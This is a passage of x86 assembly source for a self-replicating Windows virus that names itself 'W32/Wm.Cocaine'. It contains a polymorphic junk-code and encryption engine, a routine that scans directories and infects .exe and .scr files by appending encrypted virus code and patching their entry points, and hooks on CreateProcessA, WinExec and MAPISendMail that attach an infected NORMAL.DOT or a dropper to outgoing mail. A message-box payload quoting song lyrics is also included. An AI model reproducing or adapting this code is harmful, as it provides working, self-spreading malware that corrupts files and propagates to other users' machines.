mov ebx, eax
shl ebx, 2 ;displacement in dwords
mov al, 0c8h
stosb ;enter
mov eax, ebx
stosd ;size/deep
dec edi
jmp @@2
@@0:
mov al, 55h
stosb ;push ebp
mov ax, 0ec8bh
stosw ;mov ebp, esp
@@2:
push dwo [ebp+(ofs reg32-ofs vcode)] ;save reg state
mov by [ebp+(ofs _pusha-ofs vcode)], 0 ;no use pusha at start
mov eax, 3
call random
test eax, eax
je @@4 ;will use PUSHA!
@@10:
call random0 ;choose regs
and eax, 11111111b
or eax, 00110000b ;set EBP and ESP too
cmp al, -1
jz @@10
mov [ebp+(ofs reg32-ofs vcode)], eax
and eax, 11001111b
not al ;free regs are set bits now!
test eax, eax
jz @@10
@@5:
bsf edx, eax
jz @@6 ;no more regs free?
btc eax, edx ;clear it
cmp dl, 4
je @@5
cmp dl, 5 ;ebp-esp dont need be saved
je @@5
push eax
mov eax, edx ;get position
or al, 50h
stosb ;store as PUSH
pop eax
jmp @@5
@@4:
mov by [ebp+(ofs _pusha-ofs vcode)], -1 ;pusha used!
mov dwo [ebp+(ofs reg32-ofs vcode)], 00110000b
mov al, 60h ;set EBP and ESP as used
stosb ;pusha
@@6:
movzx eax, by [esi.4]
mov [ebp+(ofs lparm-ofs vcode)], eax
movzx eax, by [esi.5]
mov [ebp+(ofs lvars-ofs vcode)], eax ;set paramz to mem write/read
call garble
call garble
call garble
xor eax, eax
mov [ebp+(ofs lparm-ofs vcode)], eax ;disable mem write/read
mov [ebp+(ofs lvars-ofs vcode)], eax
mov al, [ebp+(ofs _pusha-ofs vcode)]
inc al
jnz @@7 ;well, do individual POPs
mov al, 61h
stosb ;POPA
jmp @@8
@@7:
mov eax, [ebp+(ofs reg32-ofs vcode)]
and eax, 11001111b
not al ;free regs are set bits now!
@@9:
bsr edx, eax
jz @@8 ;no more regs free?
btc eax, edx ;clear it
cmp dl, 4
je @@9
cmp dl, 5 ;ebp-esp dont need be restored
je @@9
push eax
mov eax, edx ;get position
or al, 58h
stosb ;store as POP this time
pop eax
jmp @@9
@@8:
pop dwo [ebp+(ofs reg32-ofs vcode)] ;restore reg state
@@3:
mov al, 0c9h
stosb ;leave
mov al, 0c2h
stosb ;ret
movzx eax, by [esi.4]
shl eax, 2
test eax, eax
jz @@a
stosw ;clean params
jmp @@b
@@a:
mov by [edi-1], 0c3h ;no paramz, use RETN
@@b:
call garble
pop esi
mov ecx, edi
sub ecx, esi ;distance
mov [esi-4], ecx ;patch jmp
dec by [ebp+(ofs s_into-ofs vcode)]
@@1:
ret
make_subs endp
make_call proc
cmp by [ebp+(ofs s_into-ofs vcode)], 0
jne @@1 ;cant call while creating sub
mov eax, [ebp+(ofs subs_index-ofs vcode)]
test eax, eax
jz @@1
call random ;choose one of the subs ready
mov ecx, 6
cdq
mul ecx
lea esi, [ebp+eax+(ofs subs_table-ofs vcode)]
movzx ecx, by [esi.4]
jecxz @@2 ;how much paramz it need?
@@3:
call gar
or al, 50h ;push paramz
stosb
loop @@3
@@2:
mov al, 0e8h
stosb ;build call
mov eax, dwo [esi]
sub eax, edi
sub eax,4
stosd ;store displacement
@@1:
ret
make_call endp
lea_dword proc
mov al, 8dh
stosb
call get32free
shl eax, 3
push eax
call gar
pop edx
or eax, edx
or al, 80h
stosb
call random0
stosd
ret
lea_dword endp
math_byte proc
mov eax, 8
call random
shl eax, 3
or eax, 1000000011000000b ;make math operation
push eax
call get8free
pop edx
jc @@1
or eax, edx
xchg al, ah
stosw
call random0
stosb ;byte
@@1:
ret
math_byte endp
math_word proc
mov ax, 8166h
stosw
call _math_imm
stosw
ret
math_word endp
math_dword proc
mov al, 81h
stosb
call _math_imm
stosd
ret
math_dword endp
_math_imm proc
mov eax, 8
call random
shl eax, 3
or al, 11000000b
push eax
call get32free
pop edx
or eax, edx ;patch reg into
stosb
call random0
ret
_math_imm endp
push_pop proc
call gar
or al, 50h
stosb
call garble ;recurse into
call get32free
or al, 58h
stosb
ret
push_pop endp
jmpcn proc
mov eax, 0fh
call random
or ax, 0f80h ;jcc near
xchg al, ah
stosw
stosd
push edi
call garble ;recurse
pop esi
mov eax, edi
sub eax, esi
mov dwo [esi-4], eax ;fix jcc
ret
jmpcn endp
jmpcs proc
mov eax, 0fh
call random
or al, 70h ;make jmp conditional
stosw
push edi
call garble ;recurse
pop esi
push edi
mov eax, esi
xchg eax, edi
sub eax, edi
mov by [esi-1], al ;fix jcc
or al, al
jns @@1 ;jmp destination too far?
mov edi, esi
dec edi
dec edi
call one_byte ;replace with 2 byte instr
call one_byte
@@1:
pop edi
ret
jmpcs endp
jmpn proc
mov al, 0e9h
stosb
mov eax, JMP_MAX
call random
inc eax
mov ecx, eax
stosd
jmp _shit
jmpn endp
jmps proc
mov eax, JMP_MAX
call random
inc eax
mov ecx, eax
mov ah, 0ebh
xchg al, ah
stosw
movzx eax, ah
_shit:
call random0 ;ecx bytes of shit
stosb
loop _shit
ret
jmps endp
movr_byte proc
call gar
push eax
call get8free
jnc @@1
pop eax
ret
@@1:
push eax
mov al, 08ah
jmp _reg_reg
movr_byte endp
movr_word proc
mov al, 66h ;word-size prefix
stosb
movr_word endp
movr_dword proc
call gar
push eax
call get32free
push eax
mov al, 08bh
_reg_reg:
stosb
pop eax ;destination
pop edx ;source
shl eax, 3
or eax, edx
or eax, 11000000b
stosb
ret
movr_dword endp
mov_dword proc
call get32free
or al, 0b8h
stosb
call random0
stosd
ret
mov_dword endp
mov_word proc
mov al, 66h
stosb
call get32free
or al, 0b8h
stosb
call random0
stosw
ret
mov_word endp
mov_byte proc
call get8free
jc @@1
or al, 0b0h
stosb
call random0
stosb
@@1:
ret
mov_byte endp
one_byte proc
mov eax, 5
call random
lea ebx, [ebp+(ofs one_byte_table-ofs vcode)]
xlat
stosb
ret
one_byte endp
inc_dec proc
call get32free
add al, 40h
call random_f
js @@1
or al, 01000b ;inc/dec
@@1:
stosb
ret
inc_dec endp
mov_zs_x proc
call random0
mov eax, 0b60fh
js @@1
mov ah, 0beh ;z/s
@@1:
adc ah, 0 ;16/8
stosw
call gar
push eax
call get32free
shl eax, 3
pop edx
or eax, edx
or al, 0c0h
stosb
ret
mov_zs_x endp
one_byte_table equ this byte
std
clc
cmc
cld
std
crypt_table equ this byte
db 080h, 030h, 034h ;xor
db 0f6h, 010h, 0f6h ;not
db 080h, 000h, 02ch ;add
db 080h, 028h, 004h ;sub
gtable equ this byte
dd ofs jmpcn-ofs vcode
dd ofs jmpcs-ofs vcode
dd ofs jmpn-ofs vcode
dd ofs jmps-ofs vcode
dd ofs one_byte-ofs vcode
dd ofs push_pop-ofs vcode
dd ofs push_pop-ofs vcode
dd ofs push_pop-ofs vcode
dd ofs push_pop-ofs vcode
dd ofs inc_dec-ofs vcode
dd ofs inc_dec-ofs vcode
dd ofs mov_zs_x-ofs vcode
dd ofs mov_zs_x-ofs vcode
dd ofs math_word-ofs vcode
dd ofs math_word-ofs vcode
dd ofs movr_word-ofs vcode
dd ofs movr_word-ofs vcode
dd ofs mov_word-ofs vcode
dd ofs mov_word-ofs vcode
dd ofs movr_byte-ofs vcode
dd ofs movr_byte-ofs vcode
dd ofs movr_byte-ofs vcode
dd ofs math_byte-ofs vcode
dd ofs math_byte-ofs vcode
dd ofs math_byte-ofs vcode
dd ofs mov_byte-ofs vcode
dd ofs mov_byte-ofs vcode
dd ofs mov_byte-ofs vcode
dd ofs math_dword-ofs vcode
dd ofs math_dword-ofs vcode
dd ofs math_dword-ofs vcode
dd ofs math_dword-ofs vcode
dd ofs math_dword-ofs vcode
dd ofs math_dword-ofs vcode
dd ofs mov_dword-ofs vcode
dd ofs mov_dword-ofs vcode
dd ofs mov_dword-ofs vcode
dd ofs mov_dword-ofs vcode
dd ofs mov_dword-ofs vcode
dd ofs mov_dword-ofs vcode
dd ofs movr_dword-ofs vcode
dd ofs movr_dword-ofs vcode
dd ofs movr_dword-ofs vcode
dd ofs movr_dword-ofs vcode
dd ofs movr_dword-ofs vcode
dd ofs movr_dword-ofs vcode
dd ofs lea_dword-ofs vcode
dd ofs lea_dword-ofs vcode
dd ofs lea_dword-ofs vcode
dd ofs lea_dword-ofs vcode
dd ofs lea_dword-ofs vcode
dd ofs lea_dword-ofs vcode
dd ofs mov_dword-ofs vcode
dd ofs mov_dword-ofs vcode
dd ofs mov_dword-ofs vcode
dd ofs mov_dword-ofs vcode
dd ofs mov_dword-ofs vcode
dd ofs mov_dword-ofs vcode
dd ofs movr_dword-ofs vcode
dd ofs movr_dword-ofs vcode
dd ofs movr_dword-ofs vcode
dd ofs movr_dword-ofs vcode
dd ofs movr_dword-ofs vcode
dd ofs movr_dword-ofs vcode
dd ofs lea_dword-ofs vcode
dd ofs lea_dword-ofs vcode
dd ofs lea_dword-ofs vcode
dd ofs lea_dword-ofs vcode
dd ofs lea_dword-ofs vcode
dd ofs lea_dword-ofs vcode
egtable equ this byte ;end of in-memory encrypted part
title1 db 'W32/Wm.Cocaine', 0
text0 db 'Your life burn faster, obey your master...', 0
text1 db 'Chop your breakfast on a mirror...', 0
text2 db 'Veins that pump with fear, sucking darkest clear...', 0
text3 db 'Taste me you will see, more is all you need...', 0
text4 db 'I will occupy, I will help you die...', 0
text5 db 'I will run through you, now I rule you too...', 0
text6 db "Master of Puppets, I'm pulling your strings...", 0
text_table equ this byte
dd ofs text0-ofs vcode
dd ofs text1-ofs vcode
dd ofs text2-ofs vcode
dd ofs text3-ofs vcode
dd ofs text4-ofs vcode
dd ofs text5-ofs vcode
dd ofs text6-ofs vcode
Payload:
nop ;on/off switch
sub ecx, ecx
push ecx
lea eax, [ebp+(ofs title1-ofs vcode)]
push eax
mov eax, 7
call random
mov eax, [ebp+(ofs text_table-ofs vcode)+eax*4]
add eax, ebp
push eax ;silly MessageBox payload
push ecx
call [ebp+(ofs _MessageBoxA-ofs vcode)]
ret
kernel db 'KERNEL32', 0
user db 'USER32', 0
mapi db 'MAPI32', 0
align 4
sGetProcAddress db 'GetProcAddress', 0 ;APIs from kernel32.dll that
sGetModuleHandle db 'GetModuleHandleA', 0 ;we need
sCreateProcessA db 'CreateProcessA', 0
sCreateFileA db 'CreateFileA', 0
sWinExec db 'WinExec', 0
sCloseHandle db 'CloseHandle', 0 ;api names, related to other 2
sLoadLibraryA db 'LoadLibraryA', 0
sFreeLibrary db 'FreeLibrary', 0
sCreateFileMappingA db 'CreateFileMappingA', 0
sMapViewOfFile db 'MapViewOfFile', 0
sUnmapViewOfFile db 'UnmapViewOfFile', 0
sFindFirstFileA db 'FindFirstFileA', 0
sFindNextFileA db 'FindNextFileA', 0
sFindClose db 'FindClose', 0
sSetEndOfFile db 'SetEndOfFile', 0
sVirtualAlloc db 'VirtualAlloc', 0
sVirtualFree db 'VirtualFree', 0
sGetSystemTime db 'GetSystemTime', 0
sGetWindowsDirectoryA db 'GetWindowsDirectoryA', 0
sGetSystemDirectoryA db 'GetSystemDirectoryA', 0
sGetCurrentDirectoryA db 'GetCurrentDirectoryA', 0
sSetFileAttributesA db 'SetFileAttributesA', 0
sSetFileTime db 'SetFileTime', 0
sExitProcess db 'ExitProcess', 0
sGetCurrentProcess db 'GetCurrentProcess', 0
sWriteProcessMemory db 'WriteProcessMemory',0
sWriteFile db 'WriteFile', 0
sDeleteFileA db 'DeleteFileA', 0
sSleep db 'Sleep', 0
sCreateThread db 'CreateThread', 0
sGetFileSize db 'GetFileSize', 0
sSetFilePointer db 'SetFilePointer', 0
sMessageBoxA db 'MessageBoxA', 0 ;USER32 functionz
sFindWindowA db 'FindWindowA', 0
sPostMessageA db 'PostMessageA', 0
sMAPISendMail db 'MAPISendMail', 0
ConsultKey proc
call @@1
@@1v dd 0
@@1:
push 000F003Fh ;KEY_ALL_ACCESS
push 0
push eax
push 80000001H
what_key equ dwo $-4
call [ebp+(ofs _RegOpenKeyEx-ofs vcode)]
test eax, eax
jnz @@0
call @@3
dd 0
@@3:
mov edx, [esp]
mov dwo [edx], MAX_PATH
lea eax, [ebp+(ofs directory-ofs vcode)]
mov esi, eax
mov [eax], eax
push eax
push 0
push 0
call @@4
db 0
@@4:
push dwo [ebp+(ofs @@1v-ofs vcode)]
call [ebp+(ofs _RegQueryValueEx-ofs vcode)]
push dwo [ebp+(ofs @@1v-ofs vcode)]
call [ebp+(ofs _RegCloseKey-ofs vcode)] ;close key
@@0:
ret
ConsultKey endp
align 4
k32_names equ this byte
dd (ofs sCreateProcessA-ofs vcode)
dd (ofs sCreateFileA-ofs vcode);these are relative pointerz
dd (ofs sWinExec-ofs vcode) ;to namez... zero end list
dd (ofs sCloseHandle-ofs vcode)
dd (ofs sLoadLibraryA-ofs vcode)
dd (ofs sFreeLibrary-ofs vcode)
dd (ofs sCreateFileMappingA-ofs vcode)
dd (ofs sMapViewOfFile-ofs vcode)
dd (ofs sUnmapViewOfFile-ofs vcode)
dd (ofs sFindFirstFileA-ofs vcode)
dd (ofs sFindNextFileA-ofs vcode)
dd (ofs sFindClose-ofs vcode)
dd (ofs sSetEndOfFile-ofs vcode)
dd (ofs sVirtualAlloc-ofs vcode)
dd (ofs sVirtualFree-ofs vcode)
dd (ofs sGetSystemTime-ofs vcode)
dd (ofs sGetWindowsDirectoryA-ofs vcode)
dd (ofs sGetSystemDirectoryA-ofs vcode)
dd (ofs sGetCurrentDirectoryA-ofs vcode)
dd (ofs sSetFileAttributesA-ofs vcode)
dd (ofs sSetFileTime-ofs vcode)
dd (ofs sExitProcess-ofs vcode)
dd (ofs sGetCurrentProcess-ofs vcode)
dd (ofs sWriteProcessMemory-ofs vcode)
dd (ofs sWriteFile-ofs vcode)
dd (ofs sDeleteFileA-ofs vcode)
dd (ofs sSleep-ofs vcode)
dd (ofs sCreateThread-ofs vcode)
dd (ofs sGetFileSize-ofs vcode)
dd (ofs sSetFilePointer-ofs vcode)
dd 0
dd (ofs sMessageBoxA-ofs vcode)
dd (ofs sFindWindowA-ofs vcode)
dd (ofs sPostMessageA-ofs vcode)
dd 0
DeleteShitFile proc
call delta
mov ebx, [esp+4]
push 80h
push ebx
call [ebp+(ofs _SetFileAttributesA-ofs vcode)]
test eax, eax
jz @@1
push ebx
call [ebp+(ofs _DeleteFileA-ofs vcode)]
@@1:
ret 4
DeleteShitFile endp
NewMAPISendMail proc
push esp ;original MAPISendMail
pushad
call delta
lea eax, [ebp+(ofs mapi-ofs vcode)]
push eax
call [ebp+(ofs _GetModuleHandle-ofs vcode)]
lea ecx, [ebp+(ofs sMAPISendMail-ofs vcode)]
push ecx
push eax
call [ebp+(ofs _GetProcAddress-ofs vcode)]
mov [esp+(8*4)], eax ;return address=MAPISendMail
mov edi, [esp+(12*4)] ;MAPI Struct
cmp dwo [edi.nFileCount], 0 ;file attached?
jnz @@3
inc dwo [edi.nFileCount] ;set 1 attachments
lea ebx, [ebp+(ofs MF-ofs vcode)]
mov [edi.lpFiles], ebx
sub eax, eax
mov edi, ebx
mov ecx, 6
rep stosd ;esi=file structure
call OpenAncev
jc @@4 ;file dont exists, binary send
call GetTemplateDir
@@aaa:
lodsb
test al, al
jnz @@aaa
call @@aab
ndot db '\NORMAL.DOT', 0
@@aab:
pop edi
xchg edi, esi
dec edi
@@aac:
lodsb
stosb
test al, al ;we'll send infected NORMAL.DOT
jnz @@aac
lea esi, [ebp+(ofs directory-ofs vcode)]
push 80h
push esi
call [ebp+(ofs _SetFileAttributesA-ofs vcode)]
test eax, eax
jz @@4 ;file exists?
mov eax, esi
mov edx, 'COD'
jmp @@5
@@4:
call CreateDropper
mov eax, [ebp+(ofs mm_on_off-ofs vcode)]
push eax ;buffer
mov eax, [ebp+(ofs fsizel-ofs vcode)]
push eax ;size
lea edi, [ebp+(ofs rbuf-ofs vcode)]
mov ebx, edi
call @@111
shitfile db 'C:\ENIACOC.SYS', 0
@@111:
pop esi
@@111a:
lodsb
stosb
test al, al
jnz @@111a
push ebx ;name
mov dwo [ebp+(ofs wd_att-ofs vcode)], 82h
call WriteDump ;hidden dump
push 00004000h+00008000h
push 0
push dwo [ebp+(ofs mm_on_off-ofs vcode)]
call [ebp+(ofs _VirtualFree-ofs vcode)]
lea eax, [ebp+(ofs rbuf-ofs vcode)]
mov edx, 'EXE'
@@5:
lea edi, [ebp+(ofs MF-ofs vcode)]
mov [edi.lpszPathName], eax ;set file to send
lea esi, [ebp+(ofs rbuf+MAX_PATH-ofs vcode)]
mov [edi.lpszFileName], esi
xchg edi, esi
mov eax, 8
call random
inc eax
inc eax
inc eax
mov ecx, eax
@@a:
mov eax, 23
call random
add al, 'A'
stosb
loop @@a
mov al, '.'
stosb
mov eax, edx
stosd
@@3:
mov dwo [ebp+(ofs mm_on_off-ofs vcode)], 0
popad
ret
NewMAPISendMail endp
NewCreateProcessA proc
push esp ;new handler for CreateProcessA
pushad
call CheckName
call delta
mov eax, [ebp+(ofs _CreateProcessA-ofs vcode)]
mov [esp+(7*4)+4], eax
popad
ret
NewCreateProcessA endp
RestoreChunkz db FALSE
NewWinExec proc
push esp ;new handler for WinExec
pushad
call CheckName
call delta
mov eax, [ebp+(ofs _WinExec-ofs vcode)]
mov [esp+(7*4)+4], eax
popad
ret
NewWinExec endp
ProcessDir proc
pushad
lea edi, [ebp+(ofs directory-ofs vcode)];edi=dir to process
add edi, eax ;eax=size of dir
lea esi, [ebp+(ofs FileMask-ofs vcode)]
movsd
movsd ;copy *.* mask
lea eax, [ebp+(ofs find_data-ofs vcode)]
push eax
lea eax, [ebp+(ofs directory-ofs vcode)]
push eax
call [ebp+(ofs _FindFirstFileA-ofs vcode)]
inc eax
jz @@0 ;no file found?
dec eax
mov [ebp+(ofs search_handle-ofs vcode)], eax
@@1:
pushad
lea esi, [ebp+(ofs directory-ofs vcode)]
sub eax, eax
mov edx, esi
@@3:
lodsb
cmp al, '\' ;search last slash
jne @@5
mov edx, esi ;update slash position
@@5:
test al, al
jnz @@3
lea esi, [ebp+(ofs filename-ofs vcode)]
mov edi, edx
@@4:
lodsb
cmp al, 'V'
je @@6
cmp al, 'v'
je @@6
cmp al, '0'
jb @@4a
cmp al, '9'
jbe @@6
@@4a:
stosb
test al, al ;copy name to path
jnz @@4
mov eax, dwo [edi-4]
or eax, 202020h
not eax
xor eax, not 'exe'
jz @@7
xor eax, ((not 'rcs')xor(not 'exe'))
jnz @@6 ;tricky, isnt? :)
@@7:
call Infect
@@6: ;process it
popad
lea eax, [ebp+(ofs find_data-ofs vcode)]
push eax
mov eax, [ebp+(ofs search_handle-ofs vcode)]
push eax
call [ebp+(ofs _FindNextFileA-ofs vcode)]
test eax, eax ;no more files in this dir?
jne @@1
@@2:
push dwo [ebp+(ofs search_handle-ofs vcode)]
call [ebp+(ofs _FindClose-ofs vcode)] ;close search
@@0:
popad
ret
ProcessDir endp
peh_machine = 4
peh_nosections = 6
peh_ntheader = 20
peh_flags = 22
peh_initdata = 32
peh_entrypoint = 40
peh_imagebase = 52
peh_imagesize = 80
peh_chksum = 88
peh_reloc1 = 160
peh_reloc2 = 164
seh_rvasz = 8
seh_rva = 12
seh_rawsz = 16
seh_raw = 20
seh_attr = 36
Infect proc ;infect PE filez
mov eax, [ebp+(ofs seed-ofs vcode)]
mov [ebp+(ofs pseed-ofs vcode)], eax
mov ecx, DIV_VALUE
call set_new_eh
mov esp,[esp+8] ;fix stack
_remove_seh:
jmp remove_seh
db 0EAh
set_new_eh:
sub edx, edx
push dwo fs:[edx]
mov fs:[edx], esp ;set SEH
mov by [ebp+(ofs inf?-ofs vcode)], dl
cmp [ebp+(ofs fsizeh-ofs vcode)], edx
jne _remove_seh ;too big?
mov eax, [ebp+(ofs fsizel-ofs vcode)]
cmp dwo [ebp+(ofs mm_on_off-ofs vcode)], 0
jnz @@5 ;skip size check for droppers
test eax, eax
jz @@5a
cmp eax, 16*1024
jbe _remove_seh ;smaller than 16kb?
@@5:
div ecx
test edx, edx ;padded to 101 boundary?
jz _remove_seh
@@5a:
call MapFile ;map file
mov ecx, eax
mov ebx, eax
jecxz _remove_seh ;error mapping
mov [ebp+(ofs map@-ofs vcode)], eax
cmp wo [ecx], 'ZM' ;EXE file?
jne @@0
cmp wo [ecx+18h], 40h
jne @@0
mov edi, [ecx+3ch]
add edi, ecx
mov [ebp+(ofs pe_header-ofs vcode)], edi
cmp dwo [edi], 'EP' ;PE EXE file?
jne @@0
cmp wo [edi+peh_machine], 014Ch ;i386?
jne @@0
movzx eax, wo [edi+peh_flags]
not al
test eax, 2002h
jnz @@0 ;isnt DLL? is executable?
mov esi, edi
movzx ecx, wo [edi+peh_nosections]
cmp ecx, 3
jb @@0 ;too few sections
dec ecx
mov eax, ecx
shl eax, 3
shl ecx, 5
add eax, ecx
movzx ecx, wo [edi+peh_ntheader]
add eax, 24
add eax, ecx ;esi=pe header
add edi, eax ;edi=section header
bt dwo [edi.seh_attr], 6 ;must be init data
jnc @@0
pushad
mov eax, [esi+peh_entrypoint]
mov [ebp+(ofs old_eip-ofs vcode)], eax ;copy entrypoint
mov edi, esi
movzx ecx, wo [edi+peh_ntheader]
add ecx, 24
add edi, ecx ;edi=first section header
mov eax, [edi+seh_rva]
mov [ebp+(ofs sRVA-ofs vcode)], eax
mov eax, [edi+seh_rawsz]
mov [ebp+(ofs RawSize-ofs vcode)], eax ;set vars for branch_entry
mov ecx, [esi+132]
mov eax, [edi+seh_rva]
add eax, [edi+seh_rvasz]
mov ebx, [esi+128]
sub eax, ebx
jc @@not_in_1st ;IT start after end of 1st sec
cmp ecx, eax
ja @@set_it
xchg eax, ecx
jmp @@set_it
@@not_in_1st:
sub ecx, ecx
@@set_it:
mov [ebp+(ofs it_size-ofs vcode)], ecx
push 00000040h
push 00002000h+00001000h+00100000h
push 32*1024
push 0
call [ebp+(ofs _VirtualAlloc-ofs vcode)]
mov [ebp+(ofs buffer2-ofs vcode)], eax
push 00000040h
push 00002000h+00001000h+00100000h
push 32*1024
push 0
call [ebp+(ofs _VirtualAlloc-ofs vcode)]
mov [ebp+(ofs buffer1-ofs vcode)], eax ;alloc 2 bufferz for poly
mov edi, eax
mov esi, ebp
mov ecx, vsize
rep movsb ;init first buffer
popad
lea eax, [ebp+(ofs kernel-ofs vcode)] ;search in kernel32
mov [ebp+(ofs dll_name-ofs vcode)], eax
lea eax, [ebp+(ofs sGetProcAddress-ofs vcode)]
call SearchIT
push eax ;push GetProcAdress
lea eax, [ebp+(ofs sGetModuleHandle-ofs vcode)]
call SearchIT
push eax ;push GetModuleHandleA
lea eax, [ebp+(ofs sCreateProcessA-ofs vcode)]
call SearchIT
push eax ;push CreateProcessA
lea eax, [ebp+(ofs sWinExec-ofs vcode)]
call SearchIT
push eax ;push WinExec
lea eax, [ebp+(ofs mapi-ofs vcode)] ;search in mapi32
mov [ebp+(ofs dll_name-ofs vcode)], eax
lea eax, [ebp+(ofs sMAPISendMail-ofs vcode)]
call SearchIT
push eax ;push MAPISendMail
sub ecx, ecx
mov edx, [edi+seh_rva]
add edx, [edi+seh_rawsz] ;rva+raw size=ep
mov [ebp+(ofs ep-ofs vcode)], edx
mov ecx, [esi+peh_imagebase]
add edx, ecx ;ep+base=delta run
mov eax, [esi+peh_entrypoint]
mov esi, [ebp+(ofs buffer1-ofs vcode)]
mov edi, [ebp+(ofs buffer2-ofs vcode)]
mov [esi+(ofs _delta-ofs vcode)], edx ;set delta in copy
mov [esi+(ofs _base-ofs vcode)], ecx
sub eax, [ebp+(ofs ep-ofs vcode)]
sub eax, 4+(ofs host_entry-ofs vcode)
mov [esi+(ofs host_entry-ofs vcode)], eax ;set entrypoint in copy
pop eax
mov [esi+(ofs OldMAPISendMail-ofs vcode)], eax
pop eax
mov [esi+(ofs OldWinExec-ofs vcode)], eax
pop eax
mov [esi+(ofs OldCreateProcessA-ofs vcode)], eax
pop eax
mov [esi+(ofs OldGetModuleHandleA-ofs vcode)], eax
pop eax
mov [esi+(ofs OldGetProcAddress-ofs vcode)], eax
mov by [esi+(ofs RestoreChunkz-ofs vcode)], FALSE
cmp dwo [ebp+(ofs RawSize-ofs vcode)], MIN_RAW
jb @@a
pushad
lea edi, [esi+(ofs rbuf-ofs vcode)] ;start of restoration table
push edi
mov ecx, (MAX_BRANCH*(128+4+4))/4
@@be0:
call random0 ;fill buffer with garbage
stosd
loop @@be0
sub eax, eax
mov [ebp+(ofs reg32-ofs vcode)], eax ;init internal vars
mov [ebp+(ofs lparm-ofs vcode)], eax
mov [ebp+(ofs lvars-ofs vcode)], eax
mov [ebp+(ofs subs_index-ofs vcode)], eax
mov [ebp+(ofs s_into-ofs vcode)], eax ;allow call
mov by [ebp+(ofs recurse-ofs vcode)], MAX_RECURSION-2
pop edi
mov eax, [ebp+(ofs old_eip-ofs vcode)] ;first chunk at
sub ecx, ecx ;counter
@@be1:
inc ecx ;chunk count
stosd ;starting RVA
stosd ;(make space for size)
call virtual2physical_
or eax, eax
jz @@fux0red
mov esi, eax
add esi, [ebp+(ofs map@-ofs vcode)]
push ecx
mov ecx, 128
push esi edi
rep movsb ;copy bytes at chunk
pop esi edi
pop ecx
lea ebx, [edi-5]
call crypt_poly
call garble ;make junk
call crypt_poly
mov [esi-4], edi ;(destine
sub [esi-4], ebx ;- previous destine(b4 junk))
;==size
mov al, 0e9h
stosd
stosb ;make JMP
pushad ;choose a suitable EIP for next
@@ce0: ;chunk(not overlapping)
mov eax, [ebp+(ofs RawSize-ofs vcode)]
sub eax, 12345678h
it_size equ dwo $-4
call random
add eax, [ebp+(ofs sRVA-ofs vcode)] ;eip=rnd(rva)+base
sub edx, edx
sub ebx, ebx ;init ok_counter,checked_counter
lea edi, [ebp+(ofs rbuf-ofs vcode)]
@@ce1:
mov esi, [edi]
add esi, [edi+4] ;entrypoint is above the end(point+sz)
cmp eax, esi ;last one, so, is valid(for dis entry)
ja @@ce3
mov esi, [edi] ;entrypoint is below current one - 129
sub esi, 129 ;so, it has enough room to grow, ok
cmp eax, esi
jnb @@ce2
@@ce3:
inc edx ;this one is ok
@@ce2:
add edi, [edi+4] ;update pointer to next chunk info
add edi, 4*2
inc ebx
cmp ecx, ebx ;all entries checked? no, continue
jne @@ce1
cmp ecx, edx ;eip allowed for all our entries?
jne @@ce0
mov [esp+(7*4)], eax ;fix eax(stack)
popad
push eax
call virtual2physical_
add eax, [ebp+(ofs map@-ofs vcode)]
mov ebx, edi
sub eax, ebx ;calc distance between chunks
mov [edi-4], eax ;patch JMP
lea eax, [edi-4] ;last patcheable jump
sub eax, [ebp+(ofs map@-ofs vcode)]
mov [ebp+(ofs patch_jump-ofs vcode)], eax
mov edi, esi
add edi, [edi-4] ;edi(table)=edi+2 dwords+junk
;(cut excess copied bytes)
pop eax
cmp ecx, MAX_BRANCH ;process next chunk
jb @@be1
popad
mov by [esi+(ofs RestoreChunkz-ofs vcode)], TRUE
@@a:
pushad
mov edi, esi
mov eax, [ebp+(ofs key1-ofs vcode)]
mov ecx, (ofs dec_end_code-ofs vcode)/4
@@loop1:
xor [edi], eax ;do 2nd loop(internal)
scasd
add eax, [ebp+(ofs key2-ofs vcode)]
loop @@loop1
popad
mov eax, (ofs DecriptInit-ofs vcode) ;where our code get control
mov ecx, vsize
call mutate ;encript
mov by [ebp+(ofs inf?-ofs vcode)], -1 ;set continue infecting
mov [ebp+(ofs polybuffer-ofs vcode)], edi
add [ebp+(ofs ep-ofs vcode)], eax ;add poly entry to file entry
cmp ecx, msize ;if poly decriptorz dont fill
jnb @@3 ;bufferz, make it bufsize long
mov ecx, msize
@@3:
mov [ebp+(ofs tamanho-ofs vcode)], ecx
@@0:
call UnmapFile
@@1:
movzx eax, by [ebp+(ofs inf?-ofs vcode)]
or eax, eax
mov by [ebp+(ofs inf?-ofs vcode)], 0 ;continue processing?
jz remove_seh
mov eax, [ebp+(ofs tamanho-ofs vcode)]
add eax, [ebp+(ofs fsizel-ofs vcode)]
call AlignD ;round mapsize to infected
mov [ebp+(ofs fsizel-ofs vcode)], eax ;mark
call MapFile
or eax, eax ;error mapping(all is fux0red)
jz @@1
mov ebx, eax
mov [ebp+(ofs map@-ofs vcode)], eax
add eax, [eax+3ch]
mov esi, eax
mov edi, eax
mov [ebp+(ofs pe_header-ofs vcode)], edi
movzx ecx, wo [esi+peh_nosections]
dec ecx
mov eax, ecx
shl eax, 3
shl ecx, 5
add eax, ecx
movzx ecx, wo [esi+peh_ntheader]
add eax, ecx
sub ecx, ecx ;esi=pe header
add eax, 24 ;ebx=map base
add edi, eax ;edi=last section header
mov [esi+peh_reloc1], ecx
mov [esi+peh_reloc2], ecx ;no more relocz
push edi esi
xchg edi, esi
mov edi, [esi+seh_raw]
add edi, [esi+seh_rawsz]
cmp dwo [ebp+(ofs RawSize-ofs vcode)], MIN_RAW
jb @@11
pushad
mov edi, [ebp+(ofs patch_jump-ofs vcode)]
mov eax, edi
add edi, ebx
call physical2virtual_ ;get rva of jump immediate
mov ebx, eax
mov eax, [ebp+(ofs ep-ofs vcode)]
sub eax, ebx ;sub it from new eip
sub eax, 4
mov [edi], eax ;patch jmp
popad
jmp @@12
@@11:
mov eax, [ebp+(ofs ep-ofs vcode)] ;get new eip
mov esi, [esp]
mov [esi+peh_entrypoint], eax ;set it in pe header
@@12:
add edi, ebx ;edi=raw ofs+raw sz+mbase
mov esi, [ebp+(ofs polybuffer-ofs vcode)]
mov edx, [ebp+(ofs tamanho-ofs vcode)]
mov ecx, edx
cld
rep movsb ;zopy vilus codle
pop esi edi
mov [esi+peh_chksum], ecx ;zero checksum
mov eax, edx
add eax, [esi+peh_initdata] ;init data size+vsize
call AlignF
mov [esi+peh_initdata], eax
mov [edi+seh_attr], 80000000h+40000000h+00000040h
;NT COMPATIBILITY ZONE
;all to make pe infection NT compliant is here
;hehe... you also must get the APIs right, of course
push dwo [ebp+(ofs fsizel-ofs vcode)]
push ebx
